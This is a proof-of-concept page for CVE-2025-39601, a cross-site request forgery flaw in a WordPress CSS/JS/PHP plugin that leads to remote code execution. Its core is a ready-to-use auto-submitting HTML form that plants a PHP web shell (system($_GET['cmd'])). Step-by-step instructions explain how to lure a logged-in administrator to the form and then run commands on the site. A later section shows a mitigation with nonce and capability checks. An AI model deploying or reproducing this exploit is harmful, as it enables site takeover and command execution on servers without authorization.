
PoC details: 319b31f53eeb8e172c577db1890a2363dbf51d56

Related vulnerability
Title: WordPress plugin Custom CSS, JS & PHP cross-site request forgery vulnerability (CVE-2025-39601)
Description: WordPress and WordPress plugins are products of the WordPress Foundation. WordPress is a blogging platform written in PHP that lets a personal blog be hosted on a server running PHP and MySQL; a WordPress plugin is an application extension for it. Versions 2.4.1 and earlier of the WordPress plugin Custom CSS, JS & PHP contain a cross-site request forgery vulnerability: the plugin is susceptible to CSRF, which may lead to remote code inclusion.
Description
WordPress Custom CSS, JS & PHP plugin <= 2.4.1 - CSRF to RCE vulnerability
Introduction

# 🚨 CVE-2025-39601 - CSRF to RCE in WordPress Custom CSS, JS & PHP plugin <= 2.4.1

## 🧠 Description

A **Cross-Site Request Forgery (CSRF)** vulnerability in the **WPFactory Custom CSS, JS & PHP** plugin allows for **Remote Code Execution (RCE)** by injecting malicious PHP code via unauthorized POST requests.  
This affects all versions **up to and including 2.4.1**.

- **CVE ID:** CVE-2025-39601  
- **Published:** 2025-04-16  
- **Updated:** 2025-04-16  
- **Severity:** 🔥 9.6 (CRITICAL)  
- **CWE:** CWE-352 - Cross-Site Request Forgery  
- **CVSS Vector:** `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H`

---

## 🖼️ Visual Proof

Below is a screenshot showing the result of a successful exploitation, demonstrating how remote code can be executed via the URL parameter:

![Nxploited](https://github.com/Nxploited/CVE-2025-39601/blob/main/img.png)

---
![Nxploited](https://github.com/Nxploited/CVE-2025-39601/blob/main/IMG2.png)

---

## 💥 Proof of Concept (PoC)

```html
<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>WordPress Custom CSS, JS & PHP plugin <= 2.4.1 - CSRF to RCE vulnerability</title>
</head>
<body onload="document.forms[0].submit()">
    <h1>CSRF PoC - WordPress Custom CSS, JS & PHP plugin <= 2.4.1</h1>
    <p>By : Nxploited | Khaled Alenazi</p>
    <form action="http://192.168.100.74:888/wordpress4/wp-admin/tools.php?page=alg-custom-php" method="POST">
        <input type="hidden" name="alg_custom_css_php_enabled" value="1">
        <input type="hidden" name="alg_custom_css_php_execute" value="plugins_loaded">
        <input type="hidden" name="alg_custom_css_php" value="<?php system($_GET['cmd']); ?>">
        <input type="hidden" name="alg_ccjp_submit" value="php">
        <noscript><input type="submit" value="Submit"></noscript>
    </form>
</body>
</html>
```

---

## 🧪 Usage

1. Host the above HTML file on any external server or local environment.
2. While an **admin user is logged in**, visit the hosted HTML file in their browser.
3. This will silently submit the form and inject PHP code into the plugin’s settings.
4. The code is then executed automatically on every page load via the `plugins_loaded` hook.
5. Example execution:
   ```
   http://target-site.com/?cmd=whoami
   ```
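The steps above succeed because the settings handler accepts the POST without a nonce or a capability check, so a form on any origin is treated like one submitted from wp-admin. As an added illustration (not the plugin's code and not the vendor's fix), the following hypothetical WordPress handler shows both checks in place; the field names reuse those in the PoC form, while the function names, the nonce action and the option handling are invented for this example:

```php
<?php
// Hypothetical admin-page handler illustrating the two checks whose absence
// makes a settings form CSRF-able: a nonce bound to the action and a
// capability check on the current user. Not code from the WPFactory plugin.

add_action( 'admin_init', 'ccjp_demo_handle_settings_post' );

function ccjp_demo_handle_settings_post() {
    // React only to our own submit button (field name taken from the PoC form).
    if ( ! isset( $_POST['alg_ccjp_submit'] ) ) {
        return;
    }

    // Capability check: editing stored PHP is equivalent to installing code,
    // so require the capability WordPress uses for option pages.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }

    // Nonce check: a cross-site form cannot carry a valid nonce, because the
    // attacker's page never sees the admin's session-bound token.
    // check_admin_referer() stops the request when the nonce is missing or stale.
    check_admin_referer( 'ccjp_demo_save_settings', 'ccjp_demo_nonce' );

    // Persist only the explicit on/off flag here; storing raw PHP from a form
    // remains high risk even with the request authenticated.
    $enabled = isset( $_POST['alg_custom_css_php_enabled'] ) ? 1 : 0;
    update_option( 'alg_custom_css_php_enabled', $enabled );
}

// Rendering side: emit the nonce field inside the form so that legitimate
// submissions from wp-admin carry it.
function ccjp_demo_render_form() {
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'tools.php?page=alg-custom-php' ) ); ?>">
        <?php wp_nonce_field( 'ccjp_demo_save_settings', 'ccjp_demo_nonce' ); ?>
        <label>
            <input type="checkbox" name="alg_custom_css_php_enabled" value="1">
            Enable custom PHP
        </label>
        <?php submit_button( 'Save', 'primary', 'alg_ccjp_submit' ); ?>
    </form>
    <?php
}
```

With the nonce in place, the PoC form in this README is rejected because its hidden fields contain no `ccjp_demo_nonce` value; the capability check additionally stops the handler from running for non-administrator sessions.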

---

## ⚠️ Disclaimer

This PoC is for **educational purposes only**.  
The author is **not responsible for any misuse or damage** caused by improper application of this information.  
Always test in controlled environments and with permission.

---

*By: Nxploited | Khaled Alenazi*